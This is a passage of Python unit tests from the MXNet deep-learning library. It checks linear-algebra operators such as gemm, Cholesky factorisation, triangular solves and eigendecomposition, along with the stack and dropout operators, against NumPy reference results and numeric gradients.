def _gemm_test_helper(dtype, grad_check, rtol_fw = None, atol_fw = None,
rtol_bw = None, atol_bw = None, num_eps = None):
def np_random_data(shape, dtype=np.float32):
return np.random.uniform(low=-0.5,
high=0.5, size=shape).astype(dtype)
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
data3 = mx.symbol.Variable('data3')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
shape1 = (2, 3)
shape2 = (3, 2)
shape3 = (3, 3)
shape4 = (2, 2)
data_in1 = np_random_data(shape1, dtype)
data_in2 = np_random_data(shape2, dtype)
data_in3 = np_random_data(shape3, dtype)
data_in4 = np_random_data(shape4, dtype)
# Check all transpositions of gemm operator.
data_in1_t = np.transpose(data_in1)
data_in2_t = np.transpose(data_in2)
res_gemm = 4. * np.dot(data_in1, data_in2) + 7. * data_in4
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.)
check_fw(test_gemm, [data_in1, data_in2, data_in4], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2, data_in4])
res_gemm = 4. * np.dot(data_in1_t, data_in2_t) + 7. * data_in3
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_a=True, transpose_b=True)
check_fw(test_gemm, [data_in1, data_in2, data_in3], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2, data_in3])
res_gemm = 4. * np.dot(data_in1_t, data_in1) + 7. * data_in3
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_a=True)
check_fw(test_gemm, [data_in1, data_in1, data_in3], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1, data_in3])
res_gemm = 4. * np.dot(data_in1, data_in1_t) + 7. * data_in4
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_b=True)
check_fw(test_gemm, [data_in1, data_in1, data_in4], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1, data_in4])
# Check batch of gemm.
a = rep_3x(data_in1, 2, 3)
b = rep_3x(data_in2, 3, 2)
c = rep_3x(data_in4, 2, 2)
r = 4. * np.dot(data_in1, data_in2) + 7. * data_in4
r = rep_3x(r, 2, 2)
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.)
check_fw(test_gemm, [a, b, c], [r])
if grad_check == 1:
check_grad(test_gemm, [a, b, c])
# Check for different axis that describes matrix rows.
a2 = np.copy(np.swapaxes(a, 0, 2))
b2 = np.copy(np.swapaxes(b, 0, 2))
c2 = np.copy(np.swapaxes(c, 0, 2))
r2 = np.copy(np.swapaxes(r, 0, 2))
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis = 0)
check_fw(test_gemm, [a2, b2, c2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2, c2])
a2 = np.copy(np.swapaxes(a, 1, 2))
b2 = np.copy(np.swapaxes(b, 1, 2))
c2 = np.copy(np.swapaxes(c, 1, 2))
r2 = np.copy(np.swapaxes(r, 1, 2))
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis = -3)
check_fw(test_gemm, [a2, b2, c2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2, c2])
# Check gemm2 operator same way as gemm.
res_gemm = 4. * np.dot(data_in1, data_in2)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4.)
check_fw(test_gemm, [data_in1, data_in2], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2])
res_gemm = 4. * np.dot(data_in1_t, data_in2_t)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True,
transpose_b=True)
check_fw(test_gemm, [data_in1, data_in2], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2])
res_gemm = 4. * np.dot(data_in1_t, data_in1)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True)
check_fw(test_gemm, [data_in1, data_in1], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1])
res_gemm = 4. * np.dot(data_in1, data_in1_t)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_b=True)
check_fw(test_gemm, [data_in1, data_in1], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1])
# Check batch of gemm2.
a = rep_3x(data_in1, 2, 3)
b = rep_3x(data_in2, 3, 2)
r = rep_3x(4. * np.dot(data_in1, data_in2), 2, 2)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4.)
check_fw(test_gemm, [a, b], [r])
if grad_check == 1:
check_grad(test_gemm, [a, b])
a2 = np.copy(np.swapaxes(a, 0, 2))
b2 = np.copy(np.swapaxes(b, 0, 2))
r2 = np.copy(np.swapaxes(r, 0, 2))
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., axis = 0)
check_fw(test_gemm, [a2, b2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2])
a2 = np.copy(np.swapaxes(a, 1, 2))
b2 = np.copy(np.swapaxes(b, 1, 2))
r2 = np.copy(np.swapaxes(r, 1, 2))
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., axis = -3)
check_fw(test_gemm, [a2, b2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2])
# Test gemm separately from other la-operators.
def test_gemm():
_gemm_test_helper(np.float64, True)
with environment('MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION', '0'):
_gemm_test_helper(np.float32, True)
if default_context().device_type == 'gpu':
with environment('MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION', '1'):
_gemm_test_helper(np.float32, True)
# Helper functions for test_laop
def _make_symm_symbol(a, ndims):
assert ndims >= 2
tr_shape = list(range(ndims))
tr_shape[-1] = ndims-2
tr_shape[-2] = ndims-1
tr_shape = tuple(tr_shape)
return 0.5 * (a + mx.sym.transpose(a, axes=tr_shape))
def _make_triangle_symm(a, ndims, m, lower, dtype=np.float32):
assert ndims >= 2
# The last two dimensions must both be m
# Create mask for lower triangle and diagonal
index = mx.sym.arange(start=0, stop=m, step=1, dtype=np.int32)
lt_mask = mx.sym.one_hot(index, depth=m, dtype=dtype)
for j in range(1, m):
part1 = mx.sym.zeros(shape=(j, m), dtype=dtype)
index = mx.sym.arange(start=0, stop=m-j, step=1, dtype=np.int32)
part2 = mx.sym.one_hot(index, depth=m, dtype=dtype)
lt_mask = lt_mask + mx.sym.concat(*[part1, part2], dim=0)
if not lower:
lt_mask = mx.sym.reshape(lt_mask, shape=(m, m))
lt_mask = mx.sym.transpose(lt_mask, axes=(1, 0))
shp = tuple([1]*(ndims-2) + [m, m])
lt_mask = mx.sym.reshape(lt_mask, shape=shp)
return mx.sym.broadcast_mul(a, lt_mask)
# @ankkhedia: Getting rid of fixed seed as flakiness could not be reproduced
# tracked at https://github.com/apache/incubator-mxnet/issues/11718
@xfail_when_nonstandard_decimal_separator
def test_laop():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 2e-6
rtol_bw = 1e-5
atol_bw = 1e-5
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
def check_fw_grad(sym, location, expected):
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
if grad_check == 1:
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
matrix = np.array([[9., 3., -6., 12.],
[3., 26., -7., -11.],
[-6., -7., 9., 7.],
[12., -11., 7., 65.]])
trian = np.array([[3., 0., 0., 0.],
[1., 5., 0., 0.],
[-2., -1., 2., 0.],
[4., -3., 6., 2.]])
pow = np.array([[2., 1., 1., 1.],
[1., 4., 1., 1.],
[1., 1., 8., 1.],
[1., 1., 1., 16.]])
inv = np.array([[8.95/3., 0.05/3., 2.65, -2.5/3.],
[0.05/3., 0.05, 0.05, 0.],
[2.65, 0.05, 2.5, -0.75],
[-2.5/3., 0., -0.75, 0.25]])
ident = np.eye(4)
shape = (4, 4, 1, 1)
ones = mx.nd.ones(shape).asnumpy()
for lower in [True, False]:
upper = not lower
# Tests with trivial 1x1 matrices.
data_in = np.random.uniform(1, 10, shape)
# test potrf
# Note: Have to symmetrize input, for gradient test to work
res_potrf = np.sqrt(data_in)
test_potrf = mx.sym.linalg.potrf(data1, lower=lower)
check_fw_grad(test_potrf, [data_in], [res_potrf])
# test potri
res_potri = np.divide(ones, data_in * data_in)
test_potri = mx.sym.linalg.potri(data1, lower=lower)
check_fw_grad(test_potri, [data_in], [res_potri])
# test trsm
trian_in = data_in * 7.
test_trsm = mx.sym.linalg.trsm(data1, data2, alpha=7., lower=lower)
check_fw_grad(test_trsm, [trian_in, data_in], [ones])
# test trmm
trian_in = np.divide(ones, trian_in)
test_trmm = mx.sym.linalg.trmm(data1, data2, alpha=7., transpose=True,
rightside=True, lower=lower)
check_fw_grad(test_trmm, [trian_in, data_in], [ones])
# test sumlogdiag
res_sumlogdiag = np.reshape(np.log(data_in), (4, 4))
test_sumlogdiag = mx.sym.linalg.sumlogdiag(data1)
check_fw_grad(test_sumlogdiag, [data_in], [res_sumlogdiag])
# more elaborate example of Cholesky factorization
low_trian = trian
if upper:
trian = np.transpose(trian)
# test potrf
test_potrf = mx.sym.linalg.potrf(_make_symm_symbol(data1, ndims=4), lower=lower)
a = rep_3x(matrix, 4, 4)
r = rep_3x(trian, 4, 4)
check_fw_grad(test_potrf, [a], [r])
#test potri
data1_ltri = _make_triangle_symm(
data1, ndims=4, m=4, lower=lower, dtype=dtype)
test_potri = mx.sym.linalg.potri(data1_ltri, lower=lower)
a = rep_3x(trian, 4, 4)
r = rep_3x(inv, 4, 4)
check_fw_grad(test_potri, [a], [r])
# test trsm
test_trsm = mx.sym.linalg.trsm(data1_ltri, data2, alpha=7., transpose=upper, lower=lower)
b = rep_3x(matrix, 4, 4)
r = rep_3x(7. * np.transpose(low_trian), 4, 4)
check_fw_grad(test_trsm, [a, b], [r])
test_trsm2 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=-2., rightside=True, transpose=lower, lower=lower)
r = rep_3x(-2. * low_trian, 4, 4)
check_fw_grad(test_trsm2, [a, b], [r])
test_trsm3 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=0.5, transpose=lower, lower=lower)
b = rep_3x(np.transpose(low_trian), 4, 4)
r = rep_3x(0.5 * ident, 4, 4)
check_fw_grad(test_trsm3, [a, b], [r])
test_trsm4 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=-0.5, rightside=True, transpose=upper, lower=lower)
b = rep_3x(low_trian, 4, 4)
r = rep_3x(-0.5 * ident, 4, 4)
check_fw_grad(test_trsm4, [a, b], [r])
# test trmm
test_trmm = mx.sym.linalg.trmm(
data1_ltri, data2, alpha=7., transpose=True, rightside=True, lower=lower)
a = [a, rep_3x(matrix, 4, 4)]
r = rep_3x(7. * np.dot(matrix, trian.T), 4, 4)
check_fw_grad(test_trmm, a, [r])
test_trmm2 = mx.sym.linalg.trmm(data1_ltri, data2, alpha=-2., lower=lower)
r = rep_3x(-2. * np.dot(trian, matrix), 4, 4)
check_fw_grad(test_trmm2, a, [r])
test_trmm3 = mx.sym.linalg.trmm(data1_ltri, data2, rightside=True, lower=lower)
r = rep_3x(np.dot(matrix, trian), 4, 4)
check_fw_grad(test_trmm3, a, [r])
test_trmm4 = mx.sym.linalg.trmm(
data1_ltri, data2, alpha=1.2, transpose=True, lower=lower)
r = rep_3x(1.2 * np.dot(trian.T, matrix), 4, 4)
check_fw_grad(test_trmm4, a, [r])
# test sumlogdiag
r = np.reshape(np.tile(10. * np.log(np.array([2.])), 3), (3,))
check_fw_grad(test_sumlogdiag, [rep_3x(pow, 4, 4)], [r])
# Tests for operators linalg.syrk, linalg.gelqf
def _gelqf_combined_symbol(a):
q, l = mx.sym.linalg.gelqf(a)
q_qt = mx.sym.linalg.syrk(q, transpose=False, alpha=1., name='Q_times_Qt')
l_q = mx.sym.linalg.trmm(l, q, alpha=1., name='L_times_Q')
return mx.sym.Group([q_qt, l_q])
# NOTE: If we leave the unused output dangling, things break if dtype=np.float64. Namely, the
# backward gradient for the unused output is of dtype np.float32 then.
# ==> Very annoying!
def _gelqf_first_output(a):
q, l = mx.sym.linalg.gelqf(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(l), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(q, bogus_scal)
def _gelqf_second_output(a):
q, l = mx.sym.linalg.gelqf(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(q), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(l, bogus_scal)
def _syevd_combined_symbol(a):
u, lam = mx.sym.linalg.syevd(a)
u_ut = mx.sym.linalg.syrk(u, transpose=False, alpha=1., name='U_times_Ut')
lam_u = mx.sym.broadcast_mul(mx.sym.reshape(lam, shape=(-2, 1)), u)
ut_lam_u = mx.sym.linalg.gemm2(u, lam_u, alpha=1., transpose_a=True,
transpose_b=False, name='Ut_L_U')
return mx.sym.Group([u_ut, ut_lam_u])
def test_laop_2():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-5
atol_bw = 1e-6
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
# Tests for linalg.syrk
mnalpha_lst = [(2, 3, 1.), (5, 3, -2.), (1, 6, 5.), (3, 3, 0.5), (4, 1, 10.), (1, 1, 1.)]
for m, n, alpha in mnalpha_lst:
#print('syrk: m={}, n={}, alpha={}'.format(m, n, alpha))
data_in1 = np.random.uniform(1, 10, (m, n))
res_syrk1 = alpha * np.dot(data_in1, data_in1.T)
test_syrk1 = mx.sym.linalg.syrk(data1, transpose=False, alpha=alpha)
check_fw(test_syrk1, [data_in1], [res_syrk1])
if grad_check == 1:
check_grad(test_syrk1, [data_in1])
res_syrk2 = alpha * np.dot(data_in1.T, data_in1)
test_syrk2 = mx.sym.linalg.syrk(data1, transpose=True, alpha=alpha)
check_fw(test_syrk2, [data_in1], [res_syrk2])
if grad_check == 1:
check_grad(test_syrk2, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, m, n)
r1_batch = rep_3x(res_syrk1, m, m)
check_fw(test_syrk1, [a_batch], [r1_batch])
if grad_check == 1:
check_grad(test_syrk1, [a_batch])
r2_batch = rep_3x(res_syrk2, n, n)
check_fw(test_syrk2, [a_batch], [r2_batch])
if grad_check == 1:
check_grad(test_syrk2, [a_batch])
# Tests for linalg.gelqf
# Currently disabled on GPU as they need cuda8
# and MxNet builds use cuda 7.5
if not (default_context() == mx.cpu()):
return
test_gelqf2 = _gelqf_combined_symbol(data1) # Outputs (dot(Q, Q.T), dot(L, Q))
test_gelqf_q = _gelqf_first_output(data1) # Output Q (L is not dangling)
test_gelqf_l = _gelqf_second_output(data1) # Output L (Q is not dangling)
mn_lst = [(4, 4), (1, 1), (5, 20), (1, 10), (15, 50)]
for m, n in mn_lst:
#print('gelqf: m={}, n={}'.format(m, n))
data_in1 = np.random.normal(0., 10., (m, n))
res_eye = np.eye(m)
res_a = data_in1
check_fw(test_gelqf2, [data_in1], [res_eye, res_a])
if grad_check == 1:
# A => Q
check_grad(test_gelqf_q, [data_in1])
# A => L
check_grad(test_gelqf_l, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, m, n)
reye_batch = rep_3x(res_eye, m, m)
ra_batch = a_batch
check_fw(test_gelqf2, [a_batch], [reye_batch, ra_batch])
if grad_check == 1:
# A => Q
check_grad(test_gelqf_q, [a_batch])
# A => L
check_grad(test_gelqf_l, [a_batch])
# Tests for operator linalg.syevd
def _syevd_first_output(a):
u, lam = mx.sym.linalg.syevd(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(lam), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(u, bogus_scal)
def _syevd_second_output(a):
u, lam = mx.sym.linalg.syevd(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(u), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(lam, bogus_scal)
def _syevd_forward(a):
lam, ut = np.linalg.eig(a)
ind = np.argsort(lam)
lam = lam[ind]
u = ut[:, ind].T
for i in range(0, a.shape[0]):
_syevd_forw_eigvec_sign(u[i])
return u, lam
def _syevd_forw_eigvec_sign(v):
ind = np.argmax(np.abs(v))
if v[ind] < 0.:
v[:] = -v
def _syevd_backward(grad_u, grad_l, u, l):
n = l.size
assert grad_l.size == n
assert grad_u.shape == (n, n)
assert u.shape == (n, n)
temp = np.dot(grad_u, u.T)
temp2 = np.diag(grad_l)
for i in range(1, n):
for j in range(0, i):
denom = 2. * (l[i] - l[j])
elem = (temp[i, j] - temp[j, i])/denom
temp2[i, j] = elem
temp2[j, i] = elem
temp3 = np.dot(u.T, temp2)
return np.dot(temp3, u)
# Seed set because the test is not robust enough to operate on random data
@pytest.mark.seed(1896893923)
def test_laop_3():
# Currently disabled on GPU as syevd needs cuda8
# and MxNet builds use cuda 7.5
if not (default_context() == mx.cpu()):
return
dtype = np.float64
rtol_fw = 1e-6
atol_fw = 1e-6
num_eps = 1e-4
rtol_bw = 1e-2
atol_bw = 1e-2
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol_fw, atol=atol_fw, dtype=dtype)
# Tests for linalg.syevd
test_syevd2 = _syevd_combined_symbol(data1) # Outputs (U U^T, U^T (diag L) U)
data1_s2 = _make_symm_symbol(data1, ndims=2)
test_syevd_u_2 = _syevd_first_output(data1_s2)
test_syevd_l_2 = _syevd_second_output(data1_s2)
data1_s4 = _make_symm_symbol(data1, ndims=4)
test_syevd_u_4 = _syevd_first_output(data1_s4)
test_syevd_l_4 = _syevd_second_output(data1_s4)
n_lst = [4, 1, 2, 10, 14]
for n in n_lst:
#print('\n** syevd: n={}'.format(n))
data_in1 = np.random.normal(0., 10., (n, n))
data_in1 = 0.5 * (data_in1 + data_in1.T)
res_eye = np.eye(n)
res_a = data_in1
check_fw(test_syevd2, [data_in1], [res_eye, res_a])
# Check backward
grad_u = np.random.normal(0., 2., (n, n))
grad_l = np.random.normal(0., 2., (n,))
bw_u, bw_l = _syevd_forward(data_in1)
grad_a = _syevd_backward(grad_u, grad_l, bw_u, bw_l)
check_bw(mx.sym.linalg.syevd(data1), [data_in1], [grad_u, grad_l], [grad_a])
if grad_check == 1:
# A => U
check_grad(test_syevd_u_2, [data_in1])
# A => L
check_grad(test_syevd_l_2, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, n, n)
reye_batch = rep_3x(res_eye, n, n)
ra_batch = a_batch
check_fw(test_syevd2, [a_batch], [reye_batch, ra_batch])
if grad_check == 1:
# A => U
check_grad(test_syevd_u_4, [a_batch])
# A => L
check_grad(test_syevd_l_4, [a_batch])
# @piyushghai - Removing the fixed seed for this test.
# Issue for flakiness is tracked at - https://github.com/apache/incubator-mxnet/issues/11721
def test_laop_4():
# Currently disabled on GPU as syevd needs cuda8
# and MxNet builds use cuda 7.5
if not (default_context() == mx.cpu()):
return
rtol_fw = 1e-6
atol_fw = 1e-6
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected, dtype :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
a_np = np.array([[1., 2.], [2., 4.]])
u_np = np.array([[0.89442718, -0.44721359], [0.44721359, 0.89442718]])
l_np = np.array([0., 5.])
test_syevd = mx.sym.linalg.syevd(data1)
# float64
#print('float64')
check_fw(test_syevd, [a_np], [u_np, l_np], np.float64)
# float32
#print('float32')
check_fw(test_syevd, [a_np], [u_np, l_np], np.float32)
def test_laop_5():
# tests for diagonal and triangular matrix extraction and generation
data = mx.symbol.Variable('data')
# test complete range of small matrices to cover corner cases
for n in range(1, 5):
# test batched and non-batched processing
for b in range(3):
shape = (n, n) if b == 0 else (b, n, n)
data_in = np.random.uniform(1, 10, shape)
# test all legal offsets of the diagonal
for offs in range(1-n, n):
# test extraction of diagonal
test_diag = mx.sym.linalg.extractdiag(data, offset=offs)
res_diag = np.diagonal(data_in, offset=offs) if b==0 else np.diagonal(data_in, axis1=1, axis2=2, offset=offs)
check_symbolic_forward(test_diag, [data_in], [res_diag])
check_numeric_gradient(test_diag, [data_in])
# test generation of diagonal matrix
test_diag2 = mx.sym.linalg.makediag(data, offset=offs)
res_diag2 = None
if b == 0:
res_diag2 = np.diagflat(res_diag, k=offs)
else:
for i in range(b):
res = np.reshape(np.diagflat(res_diag[i], k=offs), (1, n, n))
res_diag2 = res if res_diag2 is None else np.concatenate((res_diag2, res), axis=0)
check_symbolic_forward(test_diag2, [res_diag], [res_diag2])
check_numeric_gradient(test_diag2, [res_diag])
# check both settings for parameter "lower" in case of zero offset
lower_vals = [True] if offs != 0 else [True, False]
for lower in lower_vals:
# test extraction of triangle by doing a full roundtrip as the intermediate extracted
# triangle has different orderings than numpy.
test_trian = mx.sym.linalg.extracttrian(data, offset=offs, lower=lower)
test_trian = mx.sym.linalg.maketrian(test_trian, offset=offs, lower=lower)
extracts_lower = (offs < 0) or ((offs == 0) and lower)
res_trian = None
if b == 0:
res_trian = np.tril(data_in, offs) if extracts_lower else np.triu(data_in, offs)
else:
for i in range(b):
res = np.tril(data_in[i], offs) if extracts_lower else np.triu(data_in[i], offs)
res = np.reshape(res, (1, n, n))
res_trian = res if res_trian is None else np.concatenate((res_trian, res), axis=0)
check_symbolic_forward(test_trian, [data_in], [res_trian])
check_numeric_gradient(test_trian, [data_in])
# Tests for linalg.inverse
@pytest.mark.skip(reason="Test crashes https://github.com/apache/incubator-mxnet/issues/15975")
def test_laop_6():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-4
atol_bw = 1e-6
data = mx.symbol.Variable('data')
check_fw = lambda sym, location, expected:\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
## det(I + dot(v, v.T)) = 1 + dot(v.T, v) >= 1, so it's always invertible;
## det is away from zero, so the value of logdet is stable
v = np.random.random(4)
a = np.eye(4) + np.outer(v, v)
a = np.tile(a, (3, 1, 1))
permute_mat = np.eye(4)[[1, 0, 2, 3]]
# test matrix inverse
r = np.eye(4)
r = np.tile(r, (3, 1, 1))
test_inverse = mx.sym.linalg.inverse(data)
test_eye = mx.sym.linalg.gemm2(data, test_inverse)
check_fw(test_eye, [a], [r])
check_grad(test_inverse, [a])
# test matrix determinant
# det
r = np.linalg.det(a)
test_det = mx.sym.linalg.det(data)
check_fw(test_det, [a], [r])
check_grad(test_det, [a])
# test slogdet
r1 = np.array([1., 1., 1.])
r2 = np.log(np.abs(np.linalg.det(a)))
test_sign, test_logabsdet = mx.sym.linalg.slogdet(data)
check_fw(test_sign, [a], [r1])
check_fw(test_sign, [np.dot(a, permute_mat)], [-r1])
check_fw(test_logabsdet, [a], [r2])
check_grad(test_logabsdet, [a])
def test_stack():
for _ in range(100):
ndim = random.randint(1, 5)
axis = random.randint(0, ndim)
if random.randint(0, 1):
axis = axis - ndim - 1
nin = random.randint(1, 3)
dshape = [random.randint(1, 5) for _ in range(ndim)]
inputs = [np.random.uniform(size=dshape) for _ in range(nin)]
output = np.stack(inputs, axis=axis)
sym_ins = [mx.sym.var('x%d'%i) for i in range(nin)]
out = mx.sym.stack(*sym_ins, axis=axis)
check_symbolic_forward(out, inputs, [output])
check_numeric_gradient(out, inputs)
@pytest.mark.flaky
def test_dropout():
def zero_count(array, ratio):
zeros = 0
for i in array:
if i == 0:
zeros += 1
elif math.isnan(i):
assert ratio == 1 # Only valid for ratio = 1
zeros += 1
return zeros
def check_correctness(executor, input, ratio):
input = input.ravel()
output = executor.outputs[0].asnumpy().ravel()
input_sum = np.sum(input)
output_sum = np.sum(output)
# Make sure input zeroes are none (test data setup check)
assert zero_count(input, ratio) == 0
# count number of zeroes in output
output_zeroes = zero_count(output, ratio)
# Hopefully should be within ratio/2 %
error = abs(output_sum - input_sum) / input_sum
if ratio == 1.0:
assert output_zeroes == len(input)
elif ratio > 0.2:
assert output_zeroes > 0
assert error < (ratio/2)
elif ratio == 0:
assert output_zeroes == 0
def check_dropout_ratio(ratio, shape, cudnn_off=True):
# test dropout
x = mx.sym.var('data')
y = mx.sym.Dropout(x, p=ratio, cudnn_off=cudnn_off)
exe = y._simple_bind(ctx=default_context(), data=shape)
if ratio == 1:
max_value = float('nan')
else:
max_value = 1 if ratio == 0 else 1/ratio
if ratio == 1:
min_value = float('nan')
else:
min_value = 1 if ratio == 0 else 0
exe.arg_arrays[0][:] = 1
exe.forward(is_train=True)
if not math.isnan(max_value):
assert exe.outputs[0].asnumpy().max() > 0
else:
assert math.isnan(exe.outputs[0].asnumpy().max())
if not math.isnan(min_value):
assert exe.outputs[0].asnumpy().min() == min_value
else:
assert math.isnan(exe.outputs[0].asnumpy().min())
check_correctness(exe, exe.arg_arrays[0].asnumpy(), ratio)
if ratio == 0.5:
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
exe.forward(is_train=False)
assert (exe.outputs[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
# test permanent dropout
x = mx.sym.var('data')
y = mx.sym.Dropout(x, p=ratio, mode='always', cudnn_off=cudnn_off)
exe = y._simple_bind(ctx=default_context(), data=shape)
exe.arg_arrays[0][:] = 1
exe.forward(is_train=True)
assert exe.outputs[0].asnumpy().max() == max_value
assert exe.outputs[0].asnumpy().min() == min_value
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
exe.forward(is_train=False)
assert exe.outputs[0].asnumpy().max() == max_value
assert exe.outputs[0].asnumpy().min() == min_value
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
def get_slice(x, axis, idx):
ix = ()
for i in range(x.ndim):
if i == axis:
ix += (idx,)
else:
ix += (slice(None, None, None),)
return x[ix]
def check_dropout_axes(ratio, shape, axes, cudnn_off=True):
compactshape = list(shape)
for axis in axes:
compactshape[axis] = 1
compactx = mx.random.uniform(shape=tuple(compactshape))
broadcastx = compactx.broadcast_to(shape)
dropouty = mx.nd.Dropout(broadcastx, p=ratio, axes=axes, cudnn_off=cudnn_off)
for axis in axes:
target = get_slice(dropouty, axis, 0).asnumpy()
for i in range(1, shape[axis]):
assert(get_slice(dropouty, axis, i).asnumpy() == target).all()
def check_passthrough(ratio, shape, cudnn_off=True):
# test inference_mode forward and then backward
a = mx.random.uniform(shape=shape)
a.attach_grad()
with mx.autograd.record(train_mode=False):
b = mx.nd.Dropout(a, ratio, cudnn_off=cudnn_off) # dropout acts as identity
b.backward()
assert_almost_equal(a.grad.asnumpy(), mx.nd.ones_like(b).asnumpy())
shape = (100, 100)
check_dropout_ratio(0.5, shape)
check_dropout_ratio(0.0, shape)
check_dropout_ratio(1.0, shape)
check_dropout_ratio(0.75, shape)
check_dropout_ratio(0.25, shape)
check_dropout_ratio(0.5, shape, cudnn_off=False)
check_dropout_ratio(0.0, shape, cudnn_off=False)
check_dropout_ratio(1.0, shape, cudnn_off=False)
check_dropout_ratio(0.75, shape, cudnn_off=False)
check_dropout_ratio(0.25, shape, cudnn_off=False)
check_passthrough(0.5, shape)
check_passthrough(0.0, shape)
check_passthrough(1.0, shape)
check_passthrough(0.5, shape, cudnn_off=False)
check_passthrough(0.0, shape, cudnn_off=False)
check_passthrough(1.0, shape, cudnn_off=False)
nshape = (10, 10, 10, 10)
with mx.autograd.train_mode():
check_dropout_axes(0.25, nshape, axes = (0,))
check_dropout_axes(0.25, nshape, axes = (1,))
check_dropout_axes(0.25, nshape, axes = (2,))
check_dropout_axes(0.25, nshape, axes = (3,))
check_dropout_axes(0.25, nshape, axes = (0, 1))
check_dropout_axes(0.25, nshape, axes = (0, 2))
